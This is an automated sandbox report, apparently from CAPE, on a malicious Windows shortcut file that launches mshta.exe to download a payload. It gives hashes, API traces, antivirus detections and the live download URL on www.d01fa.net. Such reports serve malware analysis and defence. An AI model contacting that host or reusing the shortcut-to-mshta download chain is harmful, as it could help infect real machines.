2020-05-23 00:14:19,796 [root] INFO: Terminate event set for process 1172.
2020-05-23 00:14:19,796 [lib.api.process] INFO: Terminate event set for process 984
2020-05-23 00:14:19,796 [root] DEBUG: Terminate Event: CAPE shutdown complete for process 1172
2020-05-23 00:14:19,796 [root] DEBUG: Terminate Event: Attempting to dump process 984
2020-05-23 00:14:19,812 [root] DEBUG: DoProcessDump: Dumping Imagebase at 0x00E70000.
2020-05-23 00:14:19,812 [root] DEBUG: DumpImageInCurrentProcess: Attempting to dump virtual PE image.
2020-05-23 00:14:19,812 [root] DEBUG: DumpProcess: Instantiating PeParser with address: 0x00E70000.
2020-05-23 00:14:19,812 [root] DEBUG: DumpProcess: Module entry point VA is 0x00001576.
2020-05-23 00:14:19,812 [root] INFO: b'C:\\fHYzvOk\\CAPE\\984_9064430019142222552020|984|0;?C:\\Windows\\System32\\mshta.exe;?C:\\Windows\\System32\\mshta.exe;?'
2020-05-23 00:14:19,812 [root] INFO: cape
2020-05-23 00:14:19,812 [root] INFO: ('dump_file', 'C:\\fHYzvOk\\CAPE\\984_9064430019142222552020', b'0;?C:\\Windows\\System32\\mshta.exe;?C:\\Windows\\System32\\mshta.exe;?', ['984'], 'procdump')
2020-05-23 00:14:19,843 [root] INFO: ('dump_file', 'C:\\fHYzvOk\\CAPE\\984_9064430019142222552020', '', False, 'files')
2020-05-23 00:14:19,843 [root] DEBUG: DumpProcess: Module image dump success - dump size 0x3400.
2020-05-23 00:14:19,843 [lib.api.process] INFO: Termination confirmed for process 984
2020-05-23 00:14:19,843 [root] INFO: Terminate event set for process 984.
2020-05-23 00:14:19,859 [root] DEBUG: Terminate Event: CAPE shutdown complete for process 984
2020-05-23 00:14:19,859 [root] INFO: Created shutdown mutex.
2020-05-23 00:14:19,859 [root] INFO: ('dump_file', 'C:\\Users\\Rebecca\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\counters.dat', '', False, 'files')
2020-05-23 00:14:20,859 [root] INFO: Shutting down package.
2020-05-23 00:14:20,859 [root] INFO: Stopping auxiliary modules.
2020-05-23 00:14:20,937 [lib.common.results] WARNING: File C:\fHYzvOk\bin\procmon.xml doesn't exist anymore
2020-05-23 00:14:20,953 [root] INFO: Finishing auxiliary modules.
2020-05-23 00:14:20,953 [root] INFO: Shutting down pipe server and dumping dropped files.
2020-05-23 00:14:20,953 [root] WARNING: Folder at path "C:\fHYzvOk\debugger" does not exist, skip.
2020-05-23 00:14:20,953 [root] INFO: Analysis completed.

Machine

Name Label Manager Started On Shutdown On
win7_1 win7_1 KVM 2020-05-23 00:17:38 2020-05-23 00:22:55

File Details

File Name file
File Size 2195 bytes
File Type MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=1, Archive, ctime=Mon Jul 13 23:58:06 2009, mtime=Mon Jul 13 23:58:06 2009, atime=Tue Jul 14 01:39:21 2009, length=43520, window=hide
MD5 3ab5389155749c3f48f820df73eabe68
SHA1 ab441e38b547b2d8dbb0cc06ec181b0e0303c0e1
SHA256 9266f9cf97bafda3a1695335b2ae703a251a548fa4dbf21a2d9d8b1412606c88
SHA512 d774c8673bda17f964ffcdda4edafaf53e4fd873d195ff09ba389848cdedc8c3db6866e622f8af4948f9b46435d094581fedd17ca55ae0f04a0cb34569ca2b80
CRC32 0D9FB881
Ssdeep 24:8k7ppQcGSxA0OV+/T6ahwiC4o0c18euaoMVZ0KXQaR3+bCGO+/TDQA8PbQA8Pm:8k7/CxGBto1cKXv3AvO9U+
Yara
  • EXE_in_LNK - Identifies executable artefacts in shortcut (LNK) files. - Author: @bartblaze
  • Download_in_LNK - Identifies download artefacts in shortcut (LNK) files. - Author: @bartblaze
Download Download ZIP Resubmit sample

Signatures

SetUnhandledExceptionFilter detected (possible anti-debug)
Guard pages use detected - possible anti-debugging.
Dynamic (imported) function loading detected
DynamicLoader: LINKINFO.dll/IsValidLinkInfo
DynamicLoader: PROPSYS.dll/
DynamicLoader: PROPSYS.dll/PropVariantToGUID
DynamicLoader: PROPSYS.dll/PSGetNameFromPropertyKey
DynamicLoader: PROPSYS.dll/PSStringFromPropertyKey
DynamicLoader: PROPSYS.dll/InitVariantFromBuffer
DynamicLoader: OLEAUT32.dll/
DynamicLoader: PROPSYS.dll/PSLookupPropertyHandlerCLSID
DynamicLoader: ADVAPI32.dll/RegOpenKeyExW
DynamicLoader: ADVAPI32.dll/RegQueryValueExW
DynamicLoader: ADVAPI32.dll/RegCloseKey
DynamicLoader: PROPSYS.dll/PSCreatePropertyStoreFromObject
DynamicLoader: OLEAUT32.dll/
DynamicLoader: PROPSYS.dll/PropVariantToStringAlloc
DynamicLoader: ole32.dll/CoTaskMemRealloc
DynamicLoader: ole32.dll/CLSIDFromString
DynamicLoader: comctl32.dll/
DynamicLoader: comctl32.dll/
DynamicLoader: SHELL32.dll/
DynamicLoader: ole32.dll/CoGetMalloc
DynamicLoader: ole32.dll/CoAllowSetForegroundWindow
DynamicLoader: ole32.dll/CoCreateInstance
DynamicLoader: Secur32.dll/GetUserNameExW
DynamicLoader: api-ms-win-downlevel-shlwapi-l1-1-0.dll/PathCreateFromUrlW
DynamicLoader: SHELL32.dll/SHGetFolderPathW
DynamicLoader: OLEAUT32.dll/
DynamicLoader: api-ms-win-downlevel-advapi32-l2-1-0.dll/ConvertStringSidToSidW
DynamicLoader: ADVAPI32.dll/SaferGetPolicyInformation
DynamicLoader: sfc.dll/SfcIsFileProtected
DynamicLoader: ole32.dll/OleUninitialize
DynamicLoader: ole32.dll/CoRevokeInitializeSpy
DynamicLoader: CRYPTSP.dll/CryptReleaseContext
DynamicLoader: KERNELBASE.dll/SetThreadStackGuarantee
DynamicLoader: KERNELBASE.dll/SetThreadStackGuarantee
DynamicLoader: KERNELBASE.dll/SetThreadStackGuarantee
DynamicLoader: api-ms-win-downlevel-advapi32-l1-1-0.dll/UnregisterTraceGuids
DynamicLoader: OLEAUT32.dll/
DynamicLoader: CRYPTBASE.DLL/SystemFunction036
DynamicLoader: kernel32.dll/HeapSetInformation
DynamicLoader: kernel32.dll/RegisterApplicationRestart
DynamicLoader: mshtml.dll/RunHTMLApplication
DynamicLoader: ole32.dll/OleInitialize
DynamicLoader: SHLWAPI.dll/PathRemoveArgsW
DynamicLoader: urlmon.dll/CreateURLMonikerEx
DynamicLoader: kernel32.dll/SortGetHandle
DynamicLoader: kernel32.dll/SortCloseHandle
DynamicLoader: api-ms-win-downlevel-ole32-l1-1-0.dll/CoCreateInstance
DynamicLoader: api-ms-win-downlevel-ole32-l1-1-0.dll/CoInitializeEx
DynamicLoader: OLEAUT32.dll/
DynamicLoader: api-ms-win-downlevel-shlwapi-l2-1-0.dll/IUnknown_QueryService
DynamicLoader: SHLWAPI.dll/
DynamicLoader: api-ms-win-downlevel-ole32-l1-1-0.dll/CoTaskMemFree
DynamicLoader: OLEAUT32.dll/
DynamicLoader: OLEAUT32.dll/
DynamicLoader: OLEAUT32.dll/
DynamicLoader: urlmon.dll/
DynamicLoader: shell32.dll/SHCreateAssociationRegistration
DynamicLoader: api-ms-win-downlevel-advapi32-l1-1-0.dll/GetTokenInformation
DynamicLoader: Secur32.dll/GetUserNameExA
DynamicLoader: api-ms-win-downlevel-advapi32-l1-1-0.dll/GetSidSubAuthorityCount
DynamicLoader: api-ms-win-downlevel-advapi32-l1-1-0.dll/GetSidSubAuthority
DynamicLoader: api-ms-win-downlevel-advapi32-l1-1-0.dll/RegCreateKeyExA
DynamicLoader: api-ms-win-downlevel-advapi32-l1-1-0.dll/RegQueryValueExA
DynamicLoader: api-ms-win-downlevel-advapi32-l1-1-0.dll/RegOpenKeyExW
DynamicLoader: api-ms-win-downlevel-advapi32-l1-1-0.dll/RegGetValueW
DynamicLoader: api-ms-win-downlevel-advapi32-l1-1-0.dll/RegCloseKey
DynamicLoader: shell32.dll/SHGetKnownFolderPath
DynamicLoader: shell32.dll/SHGetKnownFolderPath
DynamicLoader: api-ms-win-downlevel-advapi32-l1-1-0.dll/CopySid
DynamicLoader: api-ms-win-downlevel-advapi32-l2-1-0.dll/ConvertSidToStringSidW
DynamicLoader: api-ms-win-downlevel-advapi32-l2-1-0.dll/ConvertStringSecurityDescriptorToSecurityDescriptorW
DynamicLoader: api-ms-win-downlevel-ole32-l1-1-0.dll/CoTaskMemFree
DynamicLoader: api-ms-win-downlevel-advapi32-l1-1-0.dll/EventRegister
DynamicLoader: api-ms-win-downlevel-advapi32-l1-1-0.dll/RegGetValueA
DynamicLoader: iertutil.dll/
DynamicLoader: iertutil.dll/
DynamicLoader: iertutil.dll/
DynamicLoader: api-ms-win-downlevel-advapi32-l1-1-0.dll/RegOpenKeyExA
DynamicLoader: api-ms-win-downlevel-ole32-l1-1-0.dll/CoTaskMemAlloc
DynamicLoader: WS2_32.dll/
DynamicLoader: WS2_32.dll/
DynamicLoader: winhttp.dll/WinHttpCreateProxyResolver
DynamicLoader: iertutil.dll/
DynamicLoader: api-ms-win-downlevel-advapi32-l1-1-0.dll/RegQueryValueExW
DynamicLoader: api-ms-win-downlevel-advapi32-l1-1-0.dll/EventActivityIdControl
DynamicLoader: api-ms-win-downlevel-advapi32-l1-1-0.dll/RegCreateKeyExW
DynamicLoader: IPHLPAPI.DLL/GetBestInterfaceEx
DynamicLoader: IPHLPAPI.DLL/GetIfEntry2
DynamicLoader: api-ms-win-downlevel-shlwapi-l2-1-0.dll/SHGetValueA
DynamicLoader: api-ms-win-downlevel-advapi32-l1-1-0.dll/RegSetValueExW
DynamicLoader: api-ms-win-downlevel-advapi32-l1-1-0.dll/RegDeleteValueW
DynamicLoader: api-ms-win-downlevel-advapi32-l1-1-0.dll/RegDeleteValueW
DynamicLoader: api-ms-win-downlevel-advapi32-l1-1-0.dll/RegDeleteValueW
DynamicLoader: api-ms-win-downlevel-advapi32-l1-1-0.dll/RegDeleteValueW
DynamicLoader: urlmon.dll/CoInternetGetSession
DynamicLoader: urlmon.dll/
DynamicLoader: WS2_32.dll/
DynamicLoader: api-ms-win-downlevel-shlwapi-l2-1-0.dll/SHStrDupW
DynamicLoader: ole32.dll/CoTaskMemAlloc
DynamicLoader: WS2_32.dll/
DynamicLoader: WS2_32.dll/WSAIoctl
DynamicLoader: WS2_32.dll/
DynamicLoader: WS2_32.dll/
DynamicLoader: IPHLPAPI.DLL/NotifyIpInterfaceChange
DynamicLoader: IPHLPAPI.DLL/NotifyUnicastIpAddressChange
DynamicLoader: DNSAPI.dll/DnsGetProxyInformation
DynamicLoader: RPCRT4.dll/NdrClientCall2
DynamicLoader: RPCRT4.dll/RpcStringBindingComposeW
DynamicLoader: RPCRT4.dll/RpcBindingFromStringBindingW
DynamicLoader: RPCRT4.dll/RpcStringFreeW
DynamicLoader: RPCRT4.dll/RpcBindingFree
DynamicLoader: api-ms-win-downlevel-ole32-l1-1-0.dll/CoInitializeEx
DynamicLoader: api-ms-win-downlevel-advapi32-l1-1-0.dll/EventWrite
DynamicLoader: api-ms-win-downlevel-ole32-l1-1-0.dll/CoCreateInstance
DynamicLoader: IPHLPAPI.DLL/GetAdaptersAddresses
DynamicLoader: WS2_32.dll/GetAddrInfoW
DynamicLoader: USER32.dll/RegisterTouchHitTestingWindow
DynamicLoader: OLEAUT32.dll/
DynamicLoader: urlmon.dll/CoInternetCreateSecurityManager
DynamicLoader: urlmon.dll/CoInternetCreateZoneManager
DynamicLoader: ole32.dll/CoInitializeEx
DynamicLoader: ole32.dll/CoUninitialize
DynamicLoader: ole32.dll/CoRegisterInitializeSpy
DynamicLoader: ole32.dll/CoRevokeInitializeSpy
DynamicLoader: OLEACC.DLL/LresultFromObject
DynamicLoader: WS2_32.dll/GetAddrInfoExW
DynamicLoader: USER32.dll/GetGUIThreadInfo
DynamicLoader: USER32.dll/GetAccCursorInfo
DynamicLoader: USER32.dll/GetCursorInfo
DynamicLoader: USER32.dll/GetWindowInfo
DynamicLoader: USER32.dll/GetTitleBarInfo
DynamicLoader: USER32.dll/GetScrollBarInfo
DynamicLoader: USER32.dll/GetComboBoxInfo
DynamicLoader: USER32.dll/GetAncestor
DynamicLoader: USER32.dll/RealChildWindowFromPoint
DynamicLoader: USER32.dll/RealGetWindowClassW
DynamicLoader: USER32.dll/GetAltTabInfoW
DynamicLoader: USER32.dll/GetListBoxInfo
DynamicLoader: USER32.dll/GetMenuBarInfo
DynamicLoader: USER32.dll/SendInput
DynamicLoader: USER32.dll/BlockInput
DynamicLoader: USER32.dll/LogicalToPhysicalPoint
DynamicLoader: USER32.dll/PhysicalToLogicalPoint
DynamicLoader: USER32.dll/WindowFromPhysicalPoint
DynamicLoader: USER32.dll/GetPhysicalCursorPos
DynamicLoader: kernel32.dll/GetModuleFileNameW
DynamicLoader: kernel32.dll/VirtualAllocEx
DynamicLoader: kernel32.dll/VirtualFreeEx
DynamicLoader: ntdll.dll/NtQueryInformationProcess
DynamicLoader: ntdll.dll/NtAllocateVirtualMemory
DynamicLoader: ntdll.dll/NtFreeVirtualMemory
DynamicLoader: OLEAUT32.dll/DllGetClassObject
DynamicLoader: OLEAUT32.dll/DllCanUnloadNow
DynamicLoader: OLEAUT32.dll/
DynamicLoader: SXS.DLL/SxsOleAut32MapIIDToProxyStubCLSID
DynamicLoader: OLEAUT32.dll/
DynamicLoader: ADVAPI32.dll/RegQueryValueW
DynamicLoader: OLEACC.DLL/ObjectFromLresult
DynamicLoader: ADVAPI32.dll/RegOpenKeyW
DynamicLoader: OLEAUT32.dll/
DynamicLoader: IPHLPAPI.DLL/ConvertInterfaceGuidToLuid
DynamicLoader: IPHLPAPI.DLL/GetIpForwardTable2
DynamicLoader: IPHLPAPI.DLL/GetIpNetEntry2
DynamicLoader: IPHLPAPI.DLL/FreeMibTable
DynamicLoader: api-ms-win-downlevel-ole32-l1-1-0.dll/StringFromIID
DynamicLoader: api-ms-win-downlevel-ole32-l1-1-0.dll/CoUninitialize
DynamicLoader: OLEAUT32.dll/
DynamicLoader: ole32.dll/RegisterDragDrop
DynamicLoader: api-ms-win-downlevel-ole32-l1-1-0.dll/CoSetProxyBlanket
DynamicLoader: ole32.dll/ObjectStublessClient10
DynamicLoader: OLEAUT32.dll/
DynamicLoader: ole32.dll/CoTaskMemFree
DynamicLoader: api-ms-win-downlevel-advapi32-l1-1-0.dll/RegEnumKeyExW
DynamicLoader: OLEAUT32.dll/
DynamicLoader: urlmon.dll/
DynamicLoader: urlmon.dll/
DynamicLoader: api-ms-win-downlevel-ole32-l1-1-0.dll/CoWaitForMultipleHandles
DynamicLoader: msls31.dll/
DynamicLoader: msls31.dll/
DynamicLoader: msls31.dll/
DynamicLoader: msls31.dll/
DynamicLoader: msls31.dll/
DynamicLoader: msls31.dll/
DynamicLoader: msls31.dll/
DynamicLoader: msls31.dll/
DynamicLoader: msls31.dll/
DynamicLoader: msls31.dll/
DynamicLoader: d2d1.dll/
DynamicLoader: DWrite.dll/DWriteCreateFactory
DynamicLoader: dxgi.dll/CreateDXGIFactory1
DynamicLoader: GDI32.dll/D3DKMTOpenAdapterFromGdiDisplayName
DynamicLoader: GDI32.dll/D3DKMTCloseAdapter
DynamicLoader: GDI32.dll/D3DKMTQueryAdapterInfo
DynamicLoader: GDI32.dll/D3DKMTOpenAdapterFromDeviceName
DynamicLoader: setupapi.dll/SetupDiGetClassDevsW
DynamicLoader: setupapi.dll/SetupDiEnumDeviceInterfaces
DynamicLoader: setupapi.dll/SetupDiGetDeviceInterfaceDetailW
DynamicLoader: setupapi.dll/SetupDiDestroyDeviceInfoList
DynamicLoader: setupapi.dll/SetupDiGetDevicePropertyW
DynamicLoader: WINTRUST.dll/WinVerifyTrust
DynamicLoader: setupapi.dll/SetupDiGetClassDevsW
DynamicLoader: setupapi.dll/SetupDiEnumDeviceInterfaces
DynamicLoader: setupapi.dll/SetupDiGetDeviceInterfaceDetailW
DynamicLoader: setupapi.dll/SetupDiDestroyDeviceInfoList
DynamicLoader: setupapi.dll/SetupDiGetDevicePropertyW
DynamicLoader: WINTRUST.dll/WinVerifyTrust
DynamicLoader: GDI32.dll/D3DKMTOpenAdapterFromGdiDisplayName
DynamicLoader: GDI32.dll/D3DKMTOpenAdapterFromDeviceName
DynamicLoader: GDI32.dll/D3DKMTCloseAdapter
DynamicLoader: GDI32.dll/D3DKMTQueryAdapterInfo
DynamicLoader: d3d11.dll/D3D11CreateDevice
DynamicLoader: dxgi.dll/CompatValue
DynamicLoader: GDI32.dll/D3DKMTOpenAdapterFromGdiDisplayName
DynamicLoader: GDI32.dll/D3DKMTCloseAdapter
DynamicLoader: GDI32.dll/D3DKMTQueryAdapterInfo
DynamicLoader: GDI32.dll/D3DKMTOpenAdapterFromDeviceName
DynamicLoader: setupapi.dll/SetupDiGetClassDevsW
DynamicLoader: setupapi.dll/SetupDiEnumDeviceInterfaces
DynamicLoader: setupapi.dll/SetupDiGetDeviceInterfaceDetailW
DynamicLoader: setupapi.dll/SetupDiDestroyDeviceInfoList
DynamicLoader: setupapi.dll/SetupDiGetDevicePropertyW
DynamicLoader: WINTRUST.dll/WinVerifyTrust
DynamicLoader: setupapi.dll/SetupDiGetClassDevsW
DynamicLoader: setupapi.dll/SetupDiEnumDeviceInterfaces
DynamicLoader: setupapi.dll/SetupDiGetDeviceInterfaceDetailW
DynamicLoader: setupapi.dll/SetupDiDestroyDeviceInfoList
DynamicLoader: setupapi.dll/SetupDiGetDevicePropertyW
DynamicLoader: WINTRUST.dll/WinVerifyTrust
DynamicLoader: GDI32.dll/D3DKMTOpenAdapterFromGdiDisplayName
DynamicLoader: GDI32.dll/D3DKMTOpenAdapterFromDeviceName
DynamicLoader: GDI32.dll/D3DKMTCloseAdapter
DynamicLoader: GDI32.dll/D3DKMTQueryAdapterInfo
DynamicLoader: D3D10Warp.dll/D3DKMTGetThunkVersion
DynamicLoader: D3D10Warp.dll/D3DKMTOpenAdapterFromGdiDisplayName
DynamicLoader: D3D10Warp.dll/D3DKMTOpenAdapterFromDeviceName
DynamicLoader: D3D10Warp.dll/D3DKMTGetDisplayModeList
DynamicLoader: D3D10Warp.dll/D3DKMTSetVidPnSourceOwner
DynamicLoader: D3D10Warp.dll/D3DKMTSetDisplayMode
DynamicLoader: D3D10Warp.dll/D3DKMTCloseAdapter
DynamicLoader: D3D10Warp.dll/D3DKMTSetGammaRamp
DynamicLoader: D3D10Warp.dll/D3DKMTGetDeviceState
DynamicLoader: D3D10Warp.dll/D3DKMTQueryAdapterInfo
DynamicLoader: D3D10Warp.dll/D3DKMTWaitForVerticalBlankEvent
DynamicLoader: GDI32.dll/D3DKMTCreateDCFromMemory
DynamicLoader: GDI32.dll/D3DKMTDestroyDCFromMemory
DynamicLoader: GDI32.dll/D3DKMTCheckVidPnExclusiveOwnership
DynamicLoader: GDI32.dll/D3DKMTCheckMonitorPowerState
DynamicLoader: GDI32.dll/D3DKMTCheckSharedResourceAccess
DynamicLoader: D3D10Warp.dll/D3DKMTSetQueuedLimit
DynamicLoader: D3D10Warp.dll/D3DKMTGetMultisampleMethodList
DynamicLoader: D3D10Warp.dll/D3DKMTQueryAdapterInfo
DynamicLoader: D3D10Warp.dll/D3DKMTSetDisplayPrivateDriverFormat
DynamicLoader: D3D10Warp.dll/D3DKMTDestroySynchronizationObject
DynamicLoader: D3D10Warp.dll/D3DKMTCreateSynchronizationObject
DynamicLoader: D3D10Warp.dll/D3DKMTDestroyContext
DynamicLoader: D3D10Warp.dll/D3DKMTCreateContext
DynamicLoader: D3D10Warp.dll/D3DKMTGetContextSchedulingPriority
DynamicLoader: D3D10Warp.dll/D3DKMTSetContextSchedulingPriority
DynamicLoader: D3D10Warp.dll/D3DKMTPresent
DynamicLoader: D3D10Warp.dll/D3DKMTDestroyDevice
DynamicLoader: D3D10Warp.dll/D3DKMTCreateDevice
DynamicLoader: D3D10Warp.dll/D3DKMTQueryAllocationResidency
DynamicLoader: D3D10Warp.dll/D3DKMTSetAllocationPriority
DynamicLoader: D3D10Warp.dll/D3DKMTDestroyAllocation
DynamicLoader: D3D10Warp.dll/D3DKMTOpenResource
DynamicLoader: D3D10Warp.dll/D3DKMTQueryResourceInfo
DynamicLoader: D3D10Warp.dll/D3DKMTCreateAllocation
DynamicLoader: D3D10Warp.dll/D3DKMTGetDeviceState
DynamicLoader: D3D10Warp.dll/D3DKMTSetDisplayMode
DynamicLoader: D3D10Warp.dll/D3DKMTSignalSynchronizationObject
DynamicLoader: D3D10Warp.dll/D3DKMTWaitForSynchronizationObject
DynamicLoader: D3D10Warp.dll/D3DKMTEscape
DynamicLoader: D3D10Warp.dll/D3DKMTUnlock
DynamicLoader: D3D10Warp.dll/D3DKMTLock
DynamicLoader: D3D10Warp.dll/D3DKMTRender
DynamicLoader: D3D10Warp.dll/OpenAdapter10_2
DynamicLoader: D3D10Warp.dll/
DynamicLoader: D3D10Warp.dll/
DynamicLoader: D3D10Warp.dll/
DynamicLoader: D3D10Warp.dll/
DynamicLoader: D3D10Warp.dll/
DynamicLoader: D3D10Warp.dll/
DynamicLoader: urlmon.dll/
DynamicLoader: urlmon.dll/
DynamicLoader: msls31.dll/
DynamicLoader: msls31.dll/
DynamicLoader: urlmon.dll/
DynamicLoader: shell32.dll/SHGetFolderPathW
DynamicLoader: USER32.dll/IsWindowRedirectedForPrint
DynamicLoader: d2d1.dll/
DynamicLoader: DWrite.dll/DWriteCreateFactory
DynamicLoader: USER32.dll/GetCurrentInputMessageSource
DynamicLoader: OLEAUT32.dll/
DynamicLoader: USER32.dll/GetCurrentInputMessageSource
DynamicLoader: USER32.dll/GetCurrentInputMessageSource
DynamicLoader: USER32.dll/GetCurrentInputMessageSource
DynamicLoader: USER32.dll/GetCurrentInputMessageSource
DynamicLoader: USER32.dll/GetCurrentInputMessageSource
DynamicLoader: USER32.dll/GetCurrentInputMessageSource
DynamicLoader: USER32.dll/GetCurrentInputMessageSource
DynamicLoader: USER32.dll/GetCurrentInputMessageSource
DynamicLoader: USER32.dll/GetCurrentInputMessageSource
DynamicLoader: USER32.dll/GetCurrentInputMessageSource
DynamicLoader: USER32.dll/GetCurrentInputMessageSource
DynamicLoader: USER32.dll/GetCurrentInputMessageSource
DynamicLoader: USER32.dll/GetCurrentInputMessageSource
DynamicLoader: USER32.dll/GetCurrentInputMessageSource
DynamicLoader: USER32.dll/GetCurrentInputMessageSource
DynamicLoader: USER32.dll/GetCurrentInputMessageSource
DynamicLoader: USER32.dll/GetCurrentInputMessageSource
DynamicLoader: USER32.dll/GetCurrentInputMessageSource
DynamicLoader: USER32.dll/GetCurrentInputMessageSource
DynamicLoader: USER32.dll/GetCurrentInputMessageSource
DynamicLoader: USER32.dll/GetCurrentInputMessageSource
DynamicLoader: USER32.dll/GetCurrentInputMessageSource
DynamicLoader: USER32.dll/GetCurrentInputMessageSource
DynamicLoader: USER32.dll/GetCurrentInputMessageSource
DynamicLoader: USER32.dll/GetCurrentInputMessageSource
DynamicLoader: USER32.dll/GetCurrentInputMessageSource
DynamicLoader: USER32.dll/GetCurrentInputMessageSource
DynamicLoader: USER32.dll/GetCurrentInputMessageSource
DynamicLoader: USER32.dll/GetCurrentInputMessageSource
DynamicLoader: USER32.dll/GetCurrentInputMessageSource
DynamicLoader: USER32.dll/GetCurrentInputMessageSource
DynamicLoader: USER32.dll/GetCurrentInputMessageSource
DynamicLoader: USER32.dll/GetCurrentInputMessageSource
DynamicLoader: USER32.dll/GetCurrentInputMessageSource
DynamicLoader: USER32.dll/GetCurrentInputMessageSource
DynamicLoader: USER32.dll/GetCurrentInputMessageSource
DynamicLoader: USER32.dll/GetCurrentInputMessageSource
DynamicLoader: USER32.dll/GetCurrentInputMessageSource
DynamicLoader: USER32.dll/GetCurrentInputMessageSource
DynamicLoader: USER32.dll/GetCurrentInputMessageSource
DynamicLoader: USER32.dll/GetCurrentInputMessageSource
DynamicLoader: USER32.dll/GetCurrentInputMessageSource
DynamicLoader: USER32.dll/GetCurrentInputMessageSource
DynamicLoader: USER32.dll/GetCurrentInputMessageSource
DynamicLoader: USER32.dll/GetCurrentInputMessageSource
DynamicLoader: USER32.dll/GetCurrentInputMessageSource
DynamicLoader: USER32.dll/GetCurrentInputMessageSource
DynamicLoader: USER32.dll/GetCurrentInputMessageSource
DynamicLoader: USER32.dll/GetCurrentInputMessageSource
DynamicLoader: USER32.dll/GetCurrentInputMessageSource
DynamicLoader: USER32.dll/GetCurrentInputMessageSource
DynamicLoader: USER32.dll/GetCurrentInputMessageSource
DynamicLoader: USER32.dll/GetCurrentInputMessageSource
DynamicLoader: USER32.dll/GetCurrentInputMessageSource
DynamicLoader: USER32.dll/GetCurrentInputMessageSource
DynamicLoader: USER32.dll/GetCurrentInputMessageSource
DynamicLoader: USER32.dll/GetCurrentInputMessageSource
DynamicLoader: USER32.dll/GetCurrentInputMessageSource
DynamicLoader: USER32.dll/GetCurrentInputMessageSource
DynamicLoader: USER32.dll/GetCurrentInputMessageSource
DynamicLoader: USER32.dll/GetCurrentInputMessageSource
DynamicLoader: USER32.dll/GetCurrentInputMessageSource
DynamicLoader: USER32.dll/GetCurrentInputMessageSource
DynamicLoader: USER32.dll/GetCurrentInputMessageSource
DynamicLoader: USER32.dll/GetCurrentInputMessageSource
DynamicLoader: USER32.dll/GetCurrentInputMessageSource
DynamicLoader: USER32.dll/GetCurrentInputMessageSource
DynamicLoader: USER32.dll/GetCurrentInputMessageSource
DynamicLoader: USER32.dll/GetCurrentInputMessageSource
DynamicLoader: USER32.dll/GetCurrentInputMessageSource
DynamicLoader: USER32.dll/GetCurrentInputMessageSource
DynamicLoader: USER32.dll/GetCurrentInputMessageSource
Performs HTTP requests potentially not found in PCAP.
url: www.d01fa.net:80//images/D817583E/16364/11542/7f1c8663/0387a17
A HTTP/S link was seen in a script or command line
Queries or connects to DNS-Over-HTTPS/DNS-Over-TLS domain or IP address
ip: 1.1.1.1
Queries or connects to DNS-Over-HTTPS/DNS-Over-TLS domain or IP address
ip: 1.1.1.1
A script process initiated network activity
request: /images/d817583e/16364/11542/7f1c8663/0387a17
File has been identified by 25 Antiviruses on VirusTotal as malicious
MicroWorld-eScan: Heur.BZC.YAX.Nioc.1.0443ACBC
McAfee: LNK/Agent-FSDJ!3AB538915574
Sangfor: Malware
Arcabit: Heur.BZC.YAX.Nioc.1.0443ACBC
F-Prot: LNK/Trojan.GPQC-4
Symantec: Trojan.Gen.NPE
Avast: Other:Malware-gen [Trj]
Kaspersky: HEUR:Trojan.WinLNK.Agent.gen
BitDefender: Heur.BZC.YAX.Nioc.1.0443ACBC
Ad-Aware: Heur.BZC.YAX.Nioc.1.0443ACBC
Sophos: Troj/DownLnk-X
DrWeb: Trojan.DownLoader33.28040
McAfee-GW-Edition: LNK/Agent-FSDJ!3AB538915574
FireEye: Heur.BZC.YAX.Nioc.1.0443ACBC
Emsisoft: Heur.BZC.YAX.Nioc.1.0443ACBC (B)
Cyren: LNK/Trojan.GPQC-4
Microsoft: Trojan:Script/Wacatac.C!ml
ZoneAlarm: Trojan.Multi.GenAutorunLnkFile.a
GData: Heur.BZC.YAX.Nioc.1.0443ACBC
ALYac: Trojan.Downloader.LnK.Gen
MAX: malware (ai score=88)
Rising: Downloader.Mshta/LNK!1.BADA (CLASSIC)
Ikarus: Trojan.Agent
AVG: Other:Malware-gen [Trj]
Qihoo-360: Generic/Trojan.066
Attempts to modify proxy settings

Screenshots


Hosts

Direct IP Country Name
Y 8.8.8.8 [VT] United States
Y 1.1.1.1 [VT] Australia

DNS

Name Response Post-Analysis Lookup
www.d01fa.net [VT] 5.181.156.24 [VT]

Summary

C:\Users\Rebecca\AppData\Local\Temp\file.lnk
C:\
C:\Windows
C:\Windows\System32
C:\Windows\System32\cftmo.exe
C:\Windows\System32\mshta.exe
C:\Windows\System32\msHta.Exe:Zone.Identifier
C:\Users
C:\Users\Rebecca
C:\Users\Rebecca\AppData
C:\Users\Rebecca\AppData\Local
C:\Users\Rebecca\AppData\Local\Temp
C:\Users\Rebecca\AppData\Local\Temp\file.lnk:Zone.Identifier
C:\Windows\System32\cmd.exe
C:\Windows\winsxs\FileMaps\$$_system32_21f9a9c4a2f8b514.cdf-ms
\Device\KsecDD
C:\Windows\Globalization\Sorting\sortdefault.nls
C:\Users\Rebecca\AppData\Local\Microsoft\Windows\Temporary Internet Files
C:\Users\Rebecca\AppData\Local\Microsoft\Windows\Temporary Internet Files\counters.dat
\??\Nsi
\Device\RasAcd
C:\Windows\System32\en-US\mshtml.dll.mui
\Device\NetBT_Tcpip_{8C26D1B6-C485-43DB-8C6E-9EBF79977CC0}
\Device\NetBT_Tcpip_{D33A5283-24A7-4033-8928-D28491165639}
\Device\NetBT_Tcpip6_{8C26D1B6-C485-43DB-8C6E-9EBF79977CC0}
\Device\NetBT_Tcpip6_{D33A5283-24A7-4033-8928-D28491165639}
C:\Windows\System32\D3D10Warp.dll
C:\Users\Rebecca\AppData\Local\Temp\file.lnk
C:\
C:\Windows
C:\Windows\System32
C:\Windows\System32\cmd.exe
C:\Windows\winsxs\FileMaps\$$_system32_21f9a9c4a2f8b514.cdf-ms
\Device\KsecDD
C:\Windows\Globalization\Sorting\sortdefault.nls
C:\Users\Rebecca\AppData\Local\Microsoft\Windows\Temporary Internet Files\counters.dat
\Device\RasAcd
C:\Windows\System32\en-US\mshtml.dll.mui
\Device\NetBT_Tcpip_{8C26D1B6-C485-43DB-8C6E-9EBF79977CC0}
\Device\NetBT_Tcpip_{D33A5283-24A7-4033-8928-D28491165639}
\Device\NetBT_Tcpip6_{8C26D1B6-C485-43DB-8C6E-9EBF79977CC0}
\Device\NetBT_Tcpip6_{D33A5283-24A7-4033-8928-D28491165639}
C:\Windows\System32\mshta.exe
C:\Users\Rebecca\AppData\Local\Microsoft\Windows\Temporary Internet Files\counters.dat
